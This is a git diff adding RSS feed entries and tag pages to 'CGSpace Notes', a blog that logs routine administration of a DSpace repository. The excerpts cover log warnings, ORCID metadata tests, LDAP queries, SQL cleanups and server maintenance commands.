+2016-12-02 03:00:32,353 WARN  com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=ADD, SubjectType=BUNDLE, SubjectID=70316, Obje ctType=BITSTREAM, ObjectID=86715, TimeStamp=1480647632318, dispatcher=1544803905, detail=&amp;#34;-1&amp;#34;, transactionID=&amp;#34;TX157907838689377964651674089851855413607&amp;#34;)
+2016-12-02 03:00:32,353 WARN  com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=MODIFY, SubjectType=ITEM, SubjectID=80044, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632351, dispatcher=1544803905, detail=[null], transactionID=&amp;#34;TX157907838689377964651674089851855413607&amp;#34;)
+&lt;/code&gt;&lt;/pre&gt;&lt;ul&gt;
+&lt;li&gt;I see thousands of them in the logs for the last few months, so it&amp;rsquo;s not related to the DSpace 5.5 upgrade&lt;/li&gt;
+&lt;li&gt;I&amp;rsquo;ve raised a ticket with Atmire to ask&lt;/li&gt;
+&lt;li&gt;Another worrying error from dspace.log is:&lt;/li&gt;
+&lt;/ul&gt;</description>
+    </item>
+    
+    <item>
+      <title>November, 2016</title>
+      <link>https://alanorth.github.io/cgspace-notes/2016-11/</link>
+      <pubDate>Tue, 01 Nov 2016 09:21:00 +0300</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2016-11/</guid>
+      <description>&lt;h2 id=&#34;2016-11-01&#34;&gt;2016-11-01&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Add &lt;code&gt;dc.type&lt;/code&gt; to the output options for Atmire&amp;rsquo;s Listings and Reports module (&lt;a href=&#34;https://github.com/ilri/DSpace/pull/286&#34;&gt;#286&lt;/a&gt;)&lt;/li&gt;
+&lt;/ul&gt;
+&lt;p&gt;&lt;img src=&#34;https://alanorth.github.io/cgspace-notes/cgspace-notes/2016/11/listings-and-reports.png&#34; alt=&#34;Listings and Reports with output type&#34;&gt;&lt;/p&gt;</description>
+    </item>
+    
+    <item>
+      <title>October, 2016</title>
+      <link>https://alanorth.github.io/cgspace-notes/2016-10/</link>
+      <pubDate>Mon, 03 Oct 2016 15:53:00 +0300</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2016-10/</guid>
+      <description>&lt;h2 id=&#34;2016-10-03&#34;&gt;2016-10-03&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Testing adding &lt;a href=&#34;https://wiki.lyrasis.org/display/DSDOC5x/ORCID+Integration#ORCIDIntegration-EditingexistingitemsusingBatchCSVEditing&#34;&gt;ORCIDs to a CSV&lt;/a&gt; file for a single item to see if the author orders get messed up&lt;/li&gt;
+&lt;li&gt;Need to test the following scenarios to see how author order is affected:
+&lt;ul&gt;
+&lt;li&gt;ORCIDs only&lt;/li&gt;
+&lt;li&gt;ORCIDs plus normal authors&lt;/li&gt;
+&lt;/ul&gt;
+&lt;/li&gt;
+&lt;li&gt;I exported a random item&amp;rsquo;s metadata as CSV, deleted &lt;em&gt;all columns&lt;/em&gt; except id and collection, and made a new coloum called &lt;code&gt;ORCID:dc.contributor.author&lt;/code&gt; with the following random ORCIDs from the ORCID registry:&lt;/li&gt;
+&lt;/ul&gt;
+&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;0000-0002-6115-0956||0000-0002-3812-8793||0000-0001-7462-405X
+&lt;/code&gt;&lt;/pre&gt;</description>
+    </item>
+    
+    <item>
+      <title>September, 2016</title>
+      <link>https://alanorth.github.io/cgspace-notes/2016-09/</link>
+      <pubDate>Thu, 01 Sep 2016 15:53:00 +0300</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2016-09/</guid>
+      <description>&lt;h2 id=&#34;2016-09-01&#34;&gt;2016-09-01&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Discuss helping CCAFS with some batch tagging of ORCID IDs for their authors&lt;/li&gt;
+&lt;li&gt;Discuss how the migration of CGIAR&amp;rsquo;s Active Directory to a flat structure will break our LDAP groups in DSpace&lt;/li&gt;
+&lt;li&gt;We had been using &lt;code&gt;DC=ILRI&lt;/code&gt; to determine whether a user was ILRI or not&lt;/li&gt;
+&lt;li&gt;It looks like we might be able to use OUs now, instead of DCs:&lt;/li&gt;
+&lt;/ul&gt;
+&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;$ ldapsearch -x -H ldaps://svcgroot2.cgiarad.org:3269/ -b &amp;#34;dc=cgiarad,dc=org&amp;#34; -D &amp;#34;admigration1@cgiarad.org&amp;#34; -W &amp;#34;(sAMAccountName=admigration1)&amp;#34;
+&lt;/code&gt;&lt;/pre&gt;</description>
+    </item>
+    
+    <item>
+      <title>August, 2016</title>
+      <link>https://alanorth.github.io/cgspace-notes/2016-08/</link>
+      <pubDate>Mon, 01 Aug 2016 15:53:00 +0300</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2016-08/</guid>
+      <description>&lt;h2 id=&#34;2016-08-01&#34;&gt;2016-08-01&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Add updated distribution license from Sisay (&lt;a href=&#34;https://github.com/ilri/DSpace/issues/259&#34;&gt;#259&lt;/a&gt;)&lt;/li&gt;
+&lt;li&gt;Play with upgrading Mirage 2 dependencies in &lt;code&gt;bower.json&lt;/code&gt; because most are several versions of out date&lt;/li&gt;
+&lt;li&gt;Bootstrap is at 3.3.0 but upstream is at 3.3.7, and upgrading to anything beyond 3.3.1 breaks glyphicons and probably more&lt;/li&gt;
+&lt;li&gt;bower stuff is a dead end, waste of time, too many issues&lt;/li&gt;
+&lt;li&gt;Anything after Bootstrap 3.3.1 makes glyphicons disappear (HTTP 404 trying to access from incorrect path of &lt;code&gt;fonts&lt;/code&gt;)&lt;/li&gt;
+&lt;li&gt;Start working on DSpace 5.1 → 5.5 port:&lt;/li&gt;
+&lt;/ul&gt;
+&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;$ git checkout -b 55new 5_x-prod
+$ git reset --hard ilri/5_x-prod
+$ git rebase -i dspace-5.5
+&lt;/code&gt;&lt;/pre&gt;</description>
+    </item>
+    
+    <item>
+      <title>July, 2016</title>
+      <link>https://alanorth.github.io/cgspace-notes/2016-07/</link>
+      <pubDate>Fri, 01 Jul 2016 10:53:00 +0300</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2016-07/</guid>
+      <description>&lt;h2 id=&#34;2016-07-01&#34;&gt;2016-07-01&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Add &lt;code&gt;dc.description.sponsorship&lt;/code&gt; to Discovery sidebar facets and make investors clickable in item view (&lt;a href=&#34;https://github.com/ilri/DSpace/issues/232&#34;&gt;#232&lt;/a&gt;)&lt;/li&gt;
+&lt;li&gt;I think this query should find and replace all authors that have &amp;ldquo;,&amp;rdquo; at the end of their names:&lt;/li&gt;
+&lt;/ul&gt;
+&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;dspacetest=# update metadatavalue set text_value = regexp_replace(text_value, &amp;#39;(^.+?),$&amp;#39;, &amp;#39;\1&amp;#39;) where metadata_field_id=3 and resource_type_id=2 and text_value ~ &amp;#39;^.+?,$&amp;#39;;
+UPDATE 95
+dspacetest=# select text_value from  metadatavalue where metadata_field_id=3 and resource_type_id=2 and text_value ~ &amp;#39;^.+?,$&amp;#39;;
+ text_value
+------------
+(0 rows)
+&lt;/code&gt;&lt;/pre&gt;&lt;ul&gt;
+&lt;li&gt;In this case the select query was showing 95 results before the update&lt;/li&gt;
+&lt;/ul&gt;</description>
+    </item>
+    
+    <item>
+      <title>June, 2016</title>
+      <link>https://alanorth.github.io/cgspace-notes/2016-06/</link>
+      <pubDate>Wed, 01 Jun 2016 10:53:00 +0300</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2016-06/</guid>
+      <description>&lt;h2 id=&#34;2016-06-01&#34;&gt;2016-06-01&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Experimenting with IFPRI OAI (we want to harvest their publications)&lt;/li&gt;
+&lt;li&gt;After reading the &lt;a href=&#34;https://www.oclc.org/support/services/contentdm/help/server-admin-help/oai-support.en.html&#34;&gt;ContentDM documentation&lt;/a&gt; I found IFPRI&amp;rsquo;s OAI endpoint: &lt;a href=&#34;http://ebrary.ifpri.org/oai/oai.php&#34;&gt;http://ebrary.ifpri.org/oai/oai.php&lt;/a&gt;&lt;/li&gt;
+&lt;li&gt;After reading the &lt;a href=&#34;https://www.openarchives.org/OAI/openarchivesprotocol.html&#34;&gt;OAI documentation&lt;/a&gt; and testing with an &lt;a href=&#34;http://validator.oaipmh.com/&#34;&gt;OAI validator&lt;/a&gt; I found out how to get their publications&lt;/li&gt;
+&lt;li&gt;This is their publications set: &lt;a href=&#34;http://ebrary.ifpri.org/oai/oai.php?verb=ListRecords&amp;amp;from=2016-01-01&amp;amp;set=p15738coll2&amp;amp;metadataPrefix=oai_dc&#34;&gt;http://ebrary.ifpri.org/oai/oai.php?verb=ListRecords&amp;amp;from=2016-01-01&amp;amp;set=p15738coll2&amp;amp;metadataPrefix=oai_dc&lt;/a&gt;&lt;/li&gt;
+&lt;li&gt;You can see the others by using the OAI &lt;code&gt;ListSets&lt;/code&gt; verb: &lt;a href=&#34;http://ebrary.ifpri.org/oai/oai.php?verb=ListSets&#34;&gt;http://ebrary.ifpri.org/oai/oai.php?verb=ListSets&lt;/a&gt;&lt;/li&gt;
+&lt;li&gt;Working on second phase of metadata migration, looks like this will work for moving CPWF-specific data in &lt;code&gt;dc.identifier.fund&lt;/code&gt; to &lt;code&gt;cg.identifier.cpwfproject&lt;/code&gt; and then the rest to &lt;code&gt;dc.description.sponsorship&lt;/code&gt;&lt;/li&gt;
+&lt;/ul&gt;</description>
+    </item>
+    
+    <item>
+      <title>May, 2016</title>
+      <link>https://alanorth.github.io/cgspace-notes/2016-05/</link>
+      <pubDate>Sun, 01 May 2016 23:06:00 +0300</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2016-05/</guid>
+      <description>&lt;h2 id=&#34;2016-05-01&#34;&gt;2016-05-01&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Since yesterday there have been 10,000 REST errors and the site has been unstable again&lt;/li&gt;
+&lt;li&gt;I have blocked access to the API now&lt;/li&gt;
+&lt;li&gt;There are 3,000 IPs accessing the REST API in a 24-hour period!&lt;/li&gt;
+&lt;/ul&gt;
+&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;# awk &amp;#39;{print $1}&amp;#39; /var/log/nginx/rest.log  | uniq | wc -l
+3168
+&lt;/code&gt;&lt;/pre&gt;</description>
+    </item>
+    
+    <item>
+      <title>April, 2016</title>
+      <link>https://alanorth.github.io/cgspace-notes/2016-04/</link>
+      <pubDate>Mon, 04 Apr 2016 11:06:00 +0300</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2016-04/</guid>
+      <description>&lt;h2 id=&#34;2016-04-04&#34;&gt;2016-04-04&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Looking at log file use on CGSpace and notice that we need to work on our cron setup a bit&lt;/li&gt;
+&lt;li&gt;We are backing up all logs in the log folder, including useless stuff like solr, cocoon, handle-plugin, etc&lt;/li&gt;
+&lt;li&gt;After running DSpace for over five years I&amp;rsquo;ve never needed to look in any other log file than dspace.log, leave alone one from last year!&lt;/li&gt;
+&lt;li&gt;This will save us a few gigs of backup space we&amp;rsquo;re paying for on S3&lt;/li&gt;
+&lt;li&gt;Also, I noticed the &lt;code&gt;checker&lt;/code&gt; log has some errors we should pay attention to:&lt;/li&gt;
+&lt;/ul&gt;</description>
+    </item>
+    
+    <item>
+      <title>March, 2016</title>
+      <link>https://alanorth.github.io/cgspace-notes/2016-03/</link>
+      <pubDate>Wed, 02 Mar 2016 16:50:00 +0300</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2016-03/</guid>
+      <description>&lt;h2 id=&#34;2016-03-02&#34;&gt;2016-03-02&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Looking at issues with author authorities on CGSpace&lt;/li&gt;
+&lt;li&gt;For some reason we still have the &lt;code&gt;index-lucene-update&lt;/code&gt; cron job active on CGSpace, but I&amp;rsquo;m pretty sure we don&amp;rsquo;t need it as of the latest few versions of Atmire&amp;rsquo;s Listings and Reports module&lt;/li&gt;
+&lt;li&gt;Reinstall my local (Mac OS X) DSpace stack with Tomcat 7, PostgreSQL 9.3, and Java JDK 1.7 to match environment on CGSpace server&lt;/li&gt;
+&lt;/ul&gt;</description>
+    </item>
+    
+    <item>
+      <title>February, 2016</title>
+      <link>https://alanorth.github.io/cgspace-notes/2016-02/</link>
+      <pubDate>Fri, 05 Feb 2016 13:18:00 +0300</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2016-02/</guid>
+      <description>&lt;h2 id=&#34;2016-02-05&#34;&gt;2016-02-05&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Looking at some DAGRIS data for Abenet Yabowork&lt;/li&gt;
+&lt;li&gt;Lots of issues with spaces, newlines, etc causing the import to fail&lt;/li&gt;
+&lt;li&gt;I noticed we have a very &lt;em&gt;interesting&lt;/em&gt; list of countries on CGSpace:&lt;/li&gt;
+&lt;/ul&gt;
+&lt;p&gt;&lt;img src=&#34;https://alanorth.github.io/cgspace-notes/cgspace-notes/2016/02/cgspace-countries.png&#34; alt=&#34;CGSpace country list&#34;&gt;&lt;/p&gt;
+&lt;ul&gt;
+&lt;li&gt;Not only are there 49,000 countries, we have some blanks (25)&amp;hellip;&lt;/li&gt;
+&lt;li&gt;Also, lots of things like &amp;ldquo;COTE D`LVOIRE&amp;rdquo; and &amp;ldquo;COTE D IVOIRE&amp;rdquo;&lt;/li&gt;
+&lt;/ul&gt;</description>
+    </item>
+    
+    <item>
+      <title>January, 2016</title>
+      <link>https://alanorth.github.io/cgspace-notes/2016-01/</link>
+      <pubDate>Wed, 13 Jan 2016 13:18:00 +0300</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2016-01/</guid>
+      <description>&lt;h2 id=&#34;2016-01-13&#34;&gt;2016-01-13&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Move ILRI collection &lt;code&gt;10568/12503&lt;/code&gt; from &lt;code&gt;10568/27869&lt;/code&gt; to &lt;code&gt;10568/27629&lt;/code&gt; using the &lt;a href=&#34;https://gist.github.com/alanorth/392c4660e8b022d99dfa&#34;&gt;move_collections.sh&lt;/a&gt; script I wrote last year.&lt;/li&gt;
+&lt;li&gt;I realized it is only necessary to clear the Cocoon cache after moving collections—rather than reindexing—as no metadata has changed, and therefore no search or browse indexes need to be updated.&lt;/li&gt;
+&lt;li&gt;Update GitHub wiki for documentation of &lt;a href=&#34;https://github.com/ilri/DSpace/wiki/Maintenance-Tasks&#34;&gt;maintenance tasks&lt;/a&gt;.&lt;/li&gt;
+&lt;/ul&gt;</description>
+    </item>
+    
+    <item>
+      <title>December, 2015</title>
+      <link>https://alanorth.github.io/cgspace-notes/2015-12/</link>
+      <pubDate>Wed, 02 Dec 2015 13:18:00 +0300</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2015-12/</guid>
+      <description>&lt;h2 id=&#34;2015-12-02&#34;&gt;2015-12-02&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Replace &lt;code&gt;lzop&lt;/code&gt; with &lt;code&gt;xz&lt;/code&gt; in log compression cron jobs on DSpace Test—it uses less space:&lt;/li&gt;
+&lt;/ul&gt;
+&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;# cd /home/dspacetest.cgiar.org/log
+# ls -lh dspace.log.2015-11-18*
+-rw-rw-r-- 1 tomcat7 tomcat7 2.0M Nov 18 23:59 dspace.log.2015-11-18
+-rw-rw-r-- 1 tomcat7 tomcat7 387K Nov 18 23:59 dspace.log.2015-11-18.lzo
+-rw-rw-r-- 1 tomcat7 tomcat7 169K Nov 18 23:59 dspace.log.2015-11-18.xz
+&lt;/code&gt;&lt;/pre&gt;</description>
+    </item>
+    
+    <item>
+      <title>November, 2015</title>
+      <link>https://alanorth.github.io/cgspace-notes/2015-11/</link>
+      <pubDate>Mon, 23 Nov 2015 17:00:57 +0300</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2015-11/</guid>
+      <description>&lt;h2 id=&#34;2015-11-22&#34;&gt;2015-11-22&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;CGSpace went down&lt;/li&gt;
+&lt;li&gt;Looks like DSpace exhausted its PostgreSQL connection pool&lt;/li&gt;
+&lt;li&gt;Last week I had increased the limit from 30 to 60, which seemed to help, but now there are many more idle connections:&lt;/li&gt;
+&lt;/ul&gt;
+&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;$ psql -c &amp;#39;SELECT * from pg_stat_activity;&amp;#39; | grep idle | grep -c cgspace
+78
+&lt;/code&gt;&lt;/pre&gt;</description>
+    </item>
+    
+  </channel>
+</rss>
diff --git a/docs/tags/notes/page/1/index.html b/docs/tags/notes/page/1/index.html
new file mode 100644
index 000000000..f1074da31
--- /dev/null
+++ b/docs/tags/notes/page/1/index.html
@@ -0,0 +1,10 @@
+<!DOCTYPE html>
+<html lang="en-us">
+  <head>
+    <title>https://alanorth.github.io/cgspace-notes/tags/notes/</title>
+    <link rel="canonical" href="https://alanorth.github.io/cgspace-notes/tags/notes/">
+    <meta name="robots" content="noindex">
+    <meta charset="utf-8">
+    <meta http-equiv="refresh" content="0; url=https://alanorth.github.io/cgspace-notes/tags/notes/">
+  </head>
+</html>
diff --git a/docs/tags/notes/page/2/index.html b/docs/tags/notes/page/2/index.html
new file mode 100644
index 000000000..486e73f36
--- /dev/null
+++ b/docs/tags/notes/page/2/index.html
@@ -0,0 +1,425 @@
+<!DOCTYPE html>
+<html lang="en" >
+
+  <head>
+    <meta charset="utf-8">
+<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
+
+
+<meta property="og:title" content="Notes" />
+<meta property="og:description" content="Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository." />
+<meta property="og:type" content="website" />
+<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/tags/notes/" />
+<meta property="og:updated_time" content="2020-11-30T12:10:20+02:00" />
+
+
+
+<meta name="twitter:card" content="summary"/>
+<meta name="twitter:title" content="Notes"/>
+<meta name="twitter:description" content="Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository."/>
+<meta name="generator" content="Hugo 0.112.3">
+
+
+    
+      
+    
+
+    <link rel="canonical" href="https://alanorth.github.io/cgspace-notes/tags/notes/">
+
+    <title>CGSpace Notes</title>
+
+    
+    <!-- combined, minified CSS -->
+    
+    <link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
+    
+
+    <!-- minified Font Awesome for SVG icons -->
+    
+    <script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
+
+    <!-- RSS 2.0 feed -->
+    <link rel="alternate" type="application/rss+xml" href="https://alanorth.github.io/cgspace-notes/tags/notes/index.xml" title="CGSpace Notes" />
+    
+
+    
+
+  </head>
+
+  <body>
+
+    
+    <div class="blog-masthead">
+      <div class="container">
+        <nav class="nav blog-nav">
+          <a class="nav-link " href="https://alanorth.github.io/cgspace-notes/">Home</a>
+        </nav>
+      </div>
+    </div>
+    
+
+    
+    
+    <header class="blog-header">
+      <div class="container">
+        <h1 class="blog-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/" rel="home">CGSpace Notes</a></h1>
+        <p class="lead blog-description" dir="auto">Documenting day-to-day work on the <a href="https://cgspace.cgiar.org">CGSpace</a> repository.</p>
+      </div>
+    </header>
+    
+    
+
+    
+    <div class="container">
+      <div class="row">
+        <div class="col-sm-8 blog-main">
+
+          
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2016-11/">November, 2016</a></h2>
+    <p class="blog-post-meta"><time datetime="2016-11-01T09:21:00+03:00">Tue Nov 01, 2016</time> by Alan Orth in 
+
+<span class="fas fa-tag" aria-hidden="true"></span>&nbsp;<a href="/tags/notes/" rel="tag">Notes</a>
+
+</p>
+  </header>
+  <h2 id="2016-11-01">2016-11-01</h2>
+<ul>
+<li>Add <code>dc.type</code> to the output options for Atmire&rsquo;s Listings and Reports module (<a href="https://github.com/ilri/DSpace/pull/286">#286</a>)</li>
+</ul>
+<p><img src="/cgspace-notes/2016/11/listings-and-reports.png" alt="Listings and Reports with output type"></p>
+  <a href='https://alanorth.github.io/cgspace-notes/2016-11/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2016-10/">October, 2016</a></h2>
+    <p class="blog-post-meta"><time datetime="2016-10-03T15:53:00+03:00">Mon Oct 03, 2016</time> by Alan Orth in 
+
+<span class="fas fa-tag" aria-hidden="true"></span>&nbsp;<a href="/tags/notes/" rel="tag">Notes</a>
+
+</p>
+  </header>
+  <h2 id="2016-10-03">2016-10-03</h2>
+<ul>
+<li>Testing adding <a href="https://wiki.lyrasis.org/display/DSDOC5x/ORCID+Integration#ORCIDIntegration-EditingexistingitemsusingBatchCSVEditing">ORCIDs to a CSV</a> file for a single item to see if the author orders get messed up</li>
+<li>Need to test the following scenarios to see how author order is affected:
+<ul>
+<li>ORCIDs only</li>
+<li>ORCIDs plus normal authors</li>
+</ul>
+</li>
+<li>I exported a random item&rsquo;s metadata as CSV, deleted <em>all columns</em> except id and collection, and made a new coloum called <code>ORCID:dc.contributor.author</code> with the following random ORCIDs from the ORCID registry:</li>
+</ul>
+<pre tabindex="0"><code>0000-0002-6115-0956||0000-0002-3812-8793||0000-0001-7462-405X
+</code></pre>
+  <a href='https://alanorth.github.io/cgspace-notes/2016-10/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2016-09/">September, 2016</a></h2>
+    <p class="blog-post-meta"><time datetime="2016-09-01T15:53:00+03:00">Thu Sep 01, 2016</time> by Alan Orth in 
+
+<span class="fas fa-tag" aria-hidden="true"></span>&nbsp;<a href="/tags/notes/" rel="tag">Notes</a>
+
+</p>
+  </header>
+  <h2 id="2016-09-01">2016-09-01</h2>
+<ul>
+<li>Discuss helping CCAFS with some batch tagging of ORCID IDs for their authors</li>
+<li>Discuss how the migration of CGIAR&rsquo;s Active Directory to a flat structure will break our LDAP groups in DSpace</li>
+<li>We had been using <code>DC=ILRI</code> to determine whether a user was ILRI or not</li>
+<li>It looks like we might be able to use OUs now, instead of DCs:</li>
+</ul>
+<pre tabindex="0"><code>$ ldapsearch -x -H ldaps://svcgroot2.cgiarad.org:3269/ -b &#34;dc=cgiarad,dc=org&#34; -D &#34;admigration1@cgiarad.org&#34; -W &#34;(sAMAccountName=admigration1)&#34;
+</code></pre>
+  <a href='https://alanorth.github.io/cgspace-notes/2016-09/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2016-08/">August, 2016</a></h2>
+    <p class="blog-post-meta"><time datetime="2016-08-01T15:53:00+03:00">Mon Aug 01, 2016</time> by Alan Orth in 
+
+<span class="fas fa-tag" aria-hidden="true"></span>&nbsp;<a href="/tags/notes/" rel="tag">Notes</a>
+
+</p>
+  </header>
+  <h2 id="2016-08-01">2016-08-01</h2>
+<ul>
+<li>Add updated distribution license from Sisay (<a href="https://github.com/ilri/DSpace/issues/259">#259</a>)</li>
+<li>Play with upgrading Mirage 2 dependencies in <code>bower.json</code> because most are several versions of out date</li>
+<li>Bootstrap is at 3.3.0 but upstream is at 3.3.7, and upgrading to anything beyond 3.3.1 breaks glyphicons and probably more</li>
+<li>bower stuff is a dead end, waste of time, too many issues</li>
+<li>Anything after Bootstrap 3.3.1 makes glyphicons disappear (HTTP 404 trying to access from incorrect path of <code>fonts</code>)</li>
+<li>Start working on DSpace 5.1 → 5.5 port:</li>
+</ul>
+<pre tabindex="0"><code>$ git checkout -b 55new 5_x-prod
+$ git reset --hard ilri/5_x-prod
+$ git rebase -i dspace-5.5
+</code></pre>
+  <a href='https://alanorth.github.io/cgspace-notes/2016-08/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2016-07/">July, 2016</a></h2>
+    <p class="blog-post-meta"><time datetime="2016-07-01T10:53:00+03:00">Fri Jul 01, 2016</time> by Alan Orth in 
+
+<span class="fas fa-tag" aria-hidden="true"></span>&nbsp;<a href="/tags/notes/" rel="tag">Notes</a>
+
+</p>
+  </header>
+  <h2 id="2016-07-01">2016-07-01</h2>
+<ul>
+<li>Add <code>dc.description.sponsorship</code> to Discovery sidebar facets and make investors clickable in item view (<a href="https://github.com/ilri/DSpace/issues/232">#232</a>)</li>
+<li>I think this query should find and replace all authors that have &ldquo;,&rdquo; at the end of their names:</li>
+</ul>
+<pre tabindex="0"><code>dspacetest=# update metadatavalue set text_value = regexp_replace(text_value, &#39;(^.+?),$&#39;, &#39;\1&#39;) where metadata_field_id=3 and resource_type_id=2 and text_value ~ &#39;^.+?,$&#39;;
+UPDATE 95
+dspacetest=# select text_value from  metadatavalue where metadata_field_id=3 and resource_type_id=2 and text_value ~ &#39;^.+?,$&#39;;
+ text_value
+------------
+(0 rows)
+</code></pre><ul>
+<li>In this case the select query was showing 95 results before the update</li>
+</ul>
+  <a href='https://alanorth.github.io/cgspace-notes/2016-07/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2016-06/">June, 2016</a></h2>
+    <p class="blog-post-meta"><time datetime="2016-06-01T10:53:00+03:00">Wed Jun 01, 2016</time> by Alan Orth in 
+
+<span class="fas fa-tag" aria-hidden="true"></span>&nbsp;<a href="/tags/notes/" rel="tag">Notes</a>
+
+</p>
+  </header>
+  <h2 id="2016-06-01">2016-06-01</h2>
+<ul>
+<li>Experimenting with IFPRI OAI (we want to harvest their publications)</li>
+<li>After reading the <a href="https://www.oclc.org/support/services/contentdm/help/server-admin-help/oai-support.en.html">ContentDM documentation</a> I found IFPRI&rsquo;s OAI endpoint: <a href="http://ebrary.ifpri.org/oai/oai.php">http://ebrary.ifpri.org/oai/oai.php</a></li>
+<li>After reading the <a href="https://www.openarchives.org/OAI/openarchivesprotocol.html">OAI documentation</a> and testing with an <a href="http://validator.oaipmh.com/">OAI validator</a> I found out how to get their publications</li>
+<li>This is their publications set: <a href="http://ebrary.ifpri.org/oai/oai.php?verb=ListRecords&amp;from=2016-01-01&amp;set=p15738coll2&amp;metadataPrefix=oai_dc">http://ebrary.ifpri.org/oai/oai.php?verb=ListRecords&amp;from=2016-01-01&amp;set=p15738coll2&amp;metadataPrefix=oai_dc</a></li>
+<li>You can see the others by using the OAI <code>ListSets</code> verb: <a href="http://ebrary.ifpri.org/oai/oai.php?verb=ListSets">http://ebrary.ifpri.org/oai/oai.php?verb=ListSets</a></li>
+<li>Working on second phase of metadata migration, looks like this will work for moving CPWF-specific data in <code>dc.identifier.fund</code> to <code>cg.identifier.cpwfproject</code> and then the rest to <code>dc.description.sponsorship</code></li>
+</ul>
+  <a href='https://alanorth.github.io/cgspace-notes/2016-06/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2016-05/">May, 2016</a></h2>
+    <p class="blog-post-meta"><time datetime="2016-05-01T23:06:00+03:00">Sun May 01, 2016</time> by Alan Orth in 
+
+<span class="fas fa-tag" aria-hidden="true"></span>&nbsp;<a href="/tags/notes/" rel="tag">Notes</a>
+
+</p>
+  </header>
+  <h2 id="2016-05-01">2016-05-01</h2>
+<ul>
+<li>Since yesterday there have been 10,000 REST errors and the site has been unstable again</li>
+<li>I have blocked access to the API now</li>
+<li>There are 3,000 IPs accessing the REST API in a 24-hour period!</li>
+</ul>
+<pre tabindex="0"><code># awk &#39;{print $1}&#39; /var/log/nginx/rest.log  | uniq | wc -l
+3168
+</code></pre>
+  <a href='https://alanorth.github.io/cgspace-notes/2016-05/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2016-04/">April, 2016</a></h2>
+    <p class="blog-post-meta"><time datetime="2016-04-04T11:06:00+03:00">Mon Apr 04, 2016</time> by Alan Orth in 
+
+<span class="fas fa-tag" aria-hidden="true"></span>&nbsp;<a href="/tags/notes/" rel="tag">Notes</a>
+
+</p>
+  </header>
+  <h2 id="2016-04-04">2016-04-04</h2>
+<ul>
